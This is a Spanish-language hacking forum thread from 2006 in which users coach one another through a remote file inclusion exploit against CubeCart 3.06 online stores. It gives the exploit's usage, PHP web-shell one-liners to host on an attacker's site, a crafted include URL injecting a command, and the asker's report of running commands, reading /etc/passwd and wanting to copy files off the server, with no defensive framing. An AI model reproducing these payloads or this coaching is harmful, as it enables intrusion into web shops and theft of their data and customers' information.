elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 03:18  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [?] duda con RFI en CubeCart
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [?] duda con RFI en CubeCart  (Leído 2,012 veces)
naragorn18

Desconectado Desconectado

Mensajes: 17


Ver Perfil
[?] duda con RFI en CubeCart
« en: 7 Enero 2006, 19:08 »

en este exploit de RFI con cubecart:
http://milw0rm.com/id.php?id=1398

ya se que es

perl 1398.pl -h host -d /directory

pero lo k no entiendo es esto

4. the php shell
#
# this exploit grabs data via regular epresionje strings. foreign php shell
# scripts will not work with this exploit. use the following code along with
# this exploit and put it in 'cmd.txt' or whatever you please:
#
#       <?passthru($_GET[cmd]);?>

$shel = "http://website.com/cmd.txt";    # cmd shell url

yo creo k ahi debo poner mi sitio web con el comando adentro pero no estyo muy seguro

« Última modificación: 8 Enero 2006, 03:15 por Sirdarckcat » En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: CubeCart exploit
« Respuesta #1 en: 7 Enero 2006, 22:27 »

quiza esto te ayude...

http://mousehack.blogspot.com/2006/01/cubecart-306-remote-command-execution.html#links

salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
naragorn18

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: CubeCart exploit
« Respuesta #2 en: 7 Enero 2006, 22:32 »

gracias, me kedo mas claro, aunke mi duda es con el gif, supongo k se debe poner algo dentro como un comando y renombrarlo a gif, verdad?
y gracias de nuevo
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: CubeCart exploit
« Respuesta #3 en: 7 Enero 2006, 22:36 »

adentro debe ir esto:

Código:
<?passthru($_GET[cmd]);?>

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
naragorn18

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: CubeCart exploit
« Respuesta #4 en: 7 Enero 2006, 22:43 »

no hay caso, me mnte un server en mi pc e instale el cubecart y no me funciono, e hice exactamente lo k me dijiste(y ya lo habia hecho anteriormente correctamente, solo pregunte pk pense que estaba haciendo algo mal pero veo k no)
 
me da este y mas errores en mi server y en otro con cubecart 3.06 Warning: main(): Failed opening '/classes/htmlMimeMail.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/renemix/public_html/ventas/includes/orderSuccess.inc.php on line 35

salu2
En línea
naragorn18

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: CubeCart exploit
« Respuesta #5 en: 7 Enero 2006, 23:07 »

bueno ahi me resultó, no entiendo pk en mi host no me resultó, supongo k venia parcheado, ahora k comando interesante puedo poner?

ls -la ya lo puse no me acuerdo cual era le otro
salu2
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: CubeCart exploit
« Respuesta #6 en: 8 Enero 2006, 03:22 »

naragorn18, solo para aclarar, no es necesario hacer un gif ...
solo metes un .txt en tu pag con el <?system($_GET['c'])?>, y listo.

para los comandos de UNIX:

http://google.com/search?q=UNIX+SHELL+COMMANDS

estaba pensando en anexar un shellbot, pero creo que no es necesario..

Saludos!!
En línea

EL_ZoRRo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Re: [?] duda con RFI en CubeCart
« Respuesta #7 en: 8 Enero 2006, 06:00 »

Código:
http=//web.com/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=CMD


Va no hay como hacerlo a pelo.

Salu2
En línea
naragorn18

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: CubeCart exploit
« Respuesta #8 en: 8 Enero 2006, 07:13 »

yo creo k seria de gran ayuda ya k solo estoy limitado a un directorio (includes) y no me puedo mo ver de ahi ni con chdir ni con dir, ni con cd.. cd /, etc tp puedo  crear carpetas

naragorn18, solo para aclarar, no es necesario hacer un gif ...
solo metes un .txt en tu pag con el <?system($_GET['c'])?>, y listo.

para los comandos de UNIX:

http://google.com/search?q=UNIX+SHELL+COMMANDS

estaba pensando en anexar un shellbot, pero creo que no es necesario..

Saludos!!
En línea
naragorn18

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: [?] duda con RFI en CubeCart
« Respuesta #9 en: 8 Enero 2006, 21:21 »

ahora si pude ejecutar comandos,!! y puedo ver archivos y todo eso pero sirdarkcat, como lo puedo salvar a mi pc?
se puede o no?
¿Y pq me sale en etc/passwd el usuario y al lado una x?
grx
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines